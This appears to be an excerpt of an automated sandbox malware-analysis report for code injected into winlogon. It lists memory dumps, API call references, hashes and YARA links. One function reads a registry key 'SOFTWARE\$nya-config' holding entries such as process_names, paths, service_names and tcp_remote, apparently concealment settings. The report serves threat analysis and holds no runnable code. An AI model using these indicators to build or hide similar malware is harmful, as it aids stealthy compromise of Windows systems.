Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: b08fb8c50f464ed379093d9854270921c734b56c222001deaac93b1b99a5f4bc
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 65319273604B8496FB618F60E880BED7370FB84758F84812ADA4E47B94DF39C649C796

Function 000001CA7D1E84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001CA7D1E84CC
RtlCaptureContext.NTDLL ref: 000001CA7D1E84F9
RtlLookupFunctionEntry.NTDLL ref: 000001CA7D1E8513
RtlVirtualUnwind.NTDLL ref: 000001CA7D1E8554
IsDebuggerPresent.KERNEL32 ref: 000001CA7D1E85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001CA7D1E85C5
UnhandledExceptionFilter.KERNEL32 ref: 000001CA7D1E85D0

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: e36a2929517430e398b6d0cc2adb5a53015578127c4b9c6c466daf903339ad4f
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: FF319E73645B84C6FB618F60E850BEE7360FB84748F84412ADA4E47B99EF39C648C752

Function 000001CA7D29CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001CA7D29CE0B
RtlLookupFunctionEntry.NTDLL ref: 000001CA7D29CE23
RtlVirtualUnwind.NTDLL ref: 000001CA7D29CE5E
IsDebuggerPresent.KERNEL32 ref: 000001CA7D29CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001CA7D29CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001CA7D29CEAC

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 3da2407669b8f480f8f756b28b7d9b8c2941b422362866d82381332b9e319530
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 3B419B33654B8486EB61CF24E8407DE73A4FB88758F940215EA9D47BA8DF39C156CB82

Function 000001CA7D21CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001CA7D21CE0B
RtlLookupFunctionEntry.NTDLL ref: 000001CA7D21CE23
RtlVirtualUnwind.NTDLL ref: 000001CA7D21CE5E
IsDebuggerPresent.KERNEL32 ref: 000001CA7D21CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001CA7D21CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001CA7D21CEAC

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: e21dcb0928847e0ad1ab47b3b2793bd05313454e03d703009cfb91f4e3bedbc5
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: FD41C537614F8486E761CF24E8407DE73A4FB88758F904119EA9D47B94DF39C146CB82

Function 000001CA7D1ECD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001CA7D1ECE0B
RtlLookupFunctionEntry.NTDLL ref: 000001CA7D1ECE23
RtlVirtualUnwind.NTDLL ref: 000001CA7D1ECE5E
IsDebuggerPresent.KERNEL32 ref: 000001CA7D1ECE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001CA7D1ECEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001CA7D1ECEAC

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 4d4afe448e738d7e3fa105810fe858d9c604cd282fc7a32b4601bf5b3b83ad03
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 4541AC33654B8486FB61CF24E840BDE77A4FB88758F900225EA8D47B99DF39C245CB42

Function 000001CA7D29DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001CA7D29DB99
FindNextFileW.KERNEL32 ref: 000001CA7D29DCCF
FindClose.KERNEL32 ref: 000001CA7D29DD0F
FindClose.KERNEL32 ref: 000001CA7D29DD3B

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: fa24c3d413903ccc1a3935427bc08479c9ec404d9b3963e817dc7376bfee203b
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 7FA1E433B4478849FB229B759448BED7BA0FB8179DF9841159E4837699CA36C043E7C3

Function 000001CA7D21DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001CA7D21DB99
FindNextFileW.KERNEL32 ref: 000001CA7D21DCCF
FindClose.KERNEL32 ref: 000001CA7D21DD0F
FindClose.KERNEL32 ref: 000001CA7D21DD3B

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 45d124b7b65d76756e98c7d09d685b6f4212555c67c952a88febd89221c6fea2
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 1AA1E633B4478889FB22DB759440BED7BA0BB8179CF9881199E5527A95CA3BC043C7C3

Function 000001CA7D1EDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001CA7D1EDB99
FindNextFileW.KERNEL32 ref: 000001CA7D1EDCCF
FindClose.KERNEL32 ref: 000001CA7D1EDD0F
FindClose.KERNEL32 ref: 000001CA7D1EDD3B

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: bca9c8bf826c505011b38fd6b5f6bfe9104125b42424f6945c05f756906d2787
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: C8A10633B4478849FB229B75E440BED7BA0BB81B9DF9C4115DA492BA95DA36C041C343

Function 000001CA7D1E8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001CA7D1E80BC
GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E80CA
GetCurrentProcessId.KERNEL32 ref: 000001CA7D1E80D6
QueryPerformanceCounter.KERNEL32 ref: 000001CA7D1E80E6

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 2ffd8be48935f38640984e0e891f6a1c018a3ddb3dfbf4d3b2fca621978af583
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 14113C36B51F088AFB00CF60E8547E833A4FB59758F840E21DA6D86BA4EF78C1558382

Function 000001CA7D29D894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000001CA7D29D220: HeapAlloc.KERNEL32(?,?,00000000,000001CA7D29C987), ref: 000001CA7D29D275

Part of subcall function 000001CA7D2A0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001CA7D2A0EEB

FindFirstFileExW.KERNEL32 ref: 000001CA7D29DB99

Part of subcall function 000001CA7D29D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D29674A), ref: 000001CA7D29D2B6
Part of subcall function 000001CA7D29D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D29674A), ref: 000001CA7D29D2C0

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: 3ea8621b35377627fdacd7b1a3c1b8087c9e356d7a72d09c49ba8589577fb77f
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: B8813533B4478485FB22DB31A544BDEB791FB847A9F884125AE9D27795CE3AC04393C2

Function 000001CA7D21D894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000001CA7D21D220: HeapAlloc.KERNEL32(?,?,00000000,000001CA7D21C987), ref: 000001CA7D21D275

Part of subcall function 000001CA7D220EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001CA7D220EEB

FindFirstFileExW.KERNEL32 ref: 000001CA7D21DB99

Part of subcall function 000001CA7D21D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D21674A), ref: 000001CA7D21D2B6
Part of subcall function 000001CA7D21D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D21674A), ref: 000001CA7D21D2C0

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: 176bc6c17da58cb777e97b847668772cea4fa243f14036d6c43020da7c5fc00a
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: C181E733B44788C5FB22DB21A550BDE7791FB447D8F888119AEA907B95DA3BC04387C2

Function 000001CA7D1ED894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000001CA7D1ED220: HeapAlloc.KERNEL32(?,?,00000000,000001CA7D1EC987), ref: 000001CA7D1ED275

Part of subcall function 000001CA7D1F0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001CA7D1F0EEB

FindFirstFileExW.KERNEL32 ref: 000001CA7D1EDB99

Part of subcall function 000001CA7D1ED2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D1E674A), ref: 000001CA7D1ED2B6
Part of subcall function 000001CA7D1ED2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D1E674A), ref: 000001CA7D1ED2C0

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: 5205a7403cca9f1548dad89f04e5f688a0c075462e664ab97e36f28573c5fae2
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: 5A81F733B4478485FB22DB22E440BDEB791FB85B99F8C4125AE99077D5DE3AC1418743

Function 000001CA7D1C2AF0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction ID: ca34dd41252b53d4a5cff9c5e57dc41cb2ffb1eb775b14f4f42dfe15e54293e6
Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction Fuzzy Hash: 541156B3A987D88BF75A9F6994517993790BB0438CFC48069D44986A94C73EC4D04F52

Function 000001CA7D291724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D29172F
HeapAlloc.KERNEL32 ref: 000001CA7D29173E

Part of subcall function 000001CA7D291264: GetProcessHeap.KERNEL32 ref: 000001CA7D29126A
Part of subcall function 000001CA7D291264: HeapAlloc.KERNEL32 ref: 000001CA7D291279
Part of subcall function 000001CA7D291264: GetProcessHeap.KERNEL32 ref: 000001CA7D291293
Part of subcall function 000001CA7D291264: HeapAlloc.KERNEL32 ref: 000001CA7D2912A4

Part of subcall function 000001CA7D291000: GetProcessHeap.KERNEL32 ref: 000001CA7D291006
Part of subcall function 000001CA7D291000: HeapAlloc.KERNEL32 ref: 000001CA7D291015
Part of subcall function 000001CA7D291000: GetProcessHeap.KERNEL32 ref: 000001CA7D291028
Part of subcall function 000001CA7D291000: HeapAlloc.KERNEL32 ref: 000001CA7D291037

RegOpenKeyExW.ADVAPI32 ref: 000001CA7D2917AE
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D2917DB
RegCloseKey.ADVAPI32 ref: 000001CA7D2917F5
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D291815
RegCloseKey.ADVAPI32 ref: 000001CA7D291830
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D291850
RegCloseKey.ADVAPI32 ref: 000001CA7D29186B
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D29188B
RegCloseKey.ADVAPI32 ref: 000001CA7D2918A6
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D2918C6
RegCloseKey.ADVAPI32 ref: 000001CA7D2918E1
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D291901
RegCloseKey.ADVAPI32 ref: 000001CA7D29191C
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D29193C
RegCloseKey.ADVAPI32 ref: 000001CA7D291957
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D291977
RegCloseKey.ADVAPI32 ref: 000001CA7D291992
RegCloseKey.ADVAPI32 ref: 000001CA7D29199C

Part of subcall function 000001CA7D2912B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D291315
Part of subcall function 000001CA7D2912B8: GetProcessHeap.KERNEL32 ref: 000001CA7D291323
Part of subcall function 000001CA7D2912B8: HeapAlloc.KERNEL32 ref: 000001CA7D291334
Part of subcall function 000001CA7D2912B8: RegEnumValueW.ADVAPI32 ref: 000001CA7D291393
Part of subcall function 000001CA7D2912B8: GetProcessHeap.KERNEL32 ref: 000001CA7D2913DB
Part of subcall function 000001CA7D2912B8: HeapAlloc.KERNEL32 ref: 000001CA7D2913E9
Part of subcall function 000001CA7D2912B8: GetProcessHeap.KERNEL32 ref: 000001CA7D291406
Part of subcall function 000001CA7D2912B8: HeapFree.KERNEL32 ref: 000001CA7D291414
Part of subcall function 000001CA7D2912B8: lstrlenW.KERNEL32 ref: 000001CA7D29141D
Part of subcall function 000001CA7D2912B8: GetProcessHeap.KERNEL32 ref: 000001CA7D29142B
Part of subcall function 000001CA7D2912B8: HeapAlloc.KERNEL32 ref: 000001CA7D291439

Strings

tcp_local, xrefs: 000001CA7D2918FA
startup, xrefs: 000001CA7D2917D1
process_names, xrefs: 000001CA7D291849
paths, xrefs: 000001CA7D291884
tcp_remote, xrefs: 000001CA7D291935
udp, xrefs: 000001CA7D291970
service_names, xrefs: 000001CA7D2918BF
SOFTWARE\$nya-config, xrefs: 000001CA7D29178E
pid, xrefs: 000001CA7D29180E

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: fb15fa20126c4c6dafad04b3a9e0ce3b22ed315104faccb0dcb3aec83ba8768e
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 7371F837B50B5889FB129F26E850A9A33A4FF88B8DF801112DD4D57B68DE26C446C3D2

Function 000001CA7D211724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D21172F
HeapAlloc.KERNEL32 ref: 000001CA7D21173E

Part of subcall function 000001CA7D211264: GetProcessHeap.KERNEL32 ref: 000001CA7D21126A
Part of subcall function 000001CA7D211264: HeapAlloc.KERNEL32 ref: 000001CA7D211279
Part of subcall function 000001CA7D211264: GetProcessHeap.KERNEL32 ref: 000001CA7D211293
Part of subcall function 000001CA7D211264: HeapAlloc.KERNEL32 ref: 000001CA7D2112A4

Part of subcall function 000001CA7D211000: GetProcessHeap.KERNEL32 ref: 000001CA7D211006
Part of subcall function 000001CA7D211000: HeapAlloc.KERNEL32 ref: 000001CA7D211015
Part of subcall function 000001CA7D211000: GetProcessHeap.KERNEL32 ref: 000001CA7D211028
Part of subcall function 000001CA7D211000: HeapAlloc.KERNEL32 ref: 000001CA7D211037

RegOpenKeyExW.ADVAPI32 ref: 000001CA7D2117AE
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D2117DB
RegCloseKey.ADVAPI32 ref: 000001CA7D2117F5
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D211815
RegCloseKey.ADVAPI32 ref: 000001CA7D211830
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D211850
RegCloseKey.ADVAPI32 ref: 000001CA7D21186B
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D21188B
RegCloseKey.ADVAPI32 ref: 000001CA7D2118A6
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D2118C6
RegCloseKey.ADVAPI32 ref: 000001CA7D2118E1
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D211901
RegCloseKey.ADVAPI32 ref: 000001CA7D21191C
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D21193C
RegCloseKey.ADVAPI32 ref: 000001CA7D211957
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D211977
RegCloseKey.ADVAPI32 ref: 000001CA7D211992
RegCloseKey.ADVAPI32 ref: 000001CA7D21199C

Part of subcall function 000001CA7D2112B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D211315
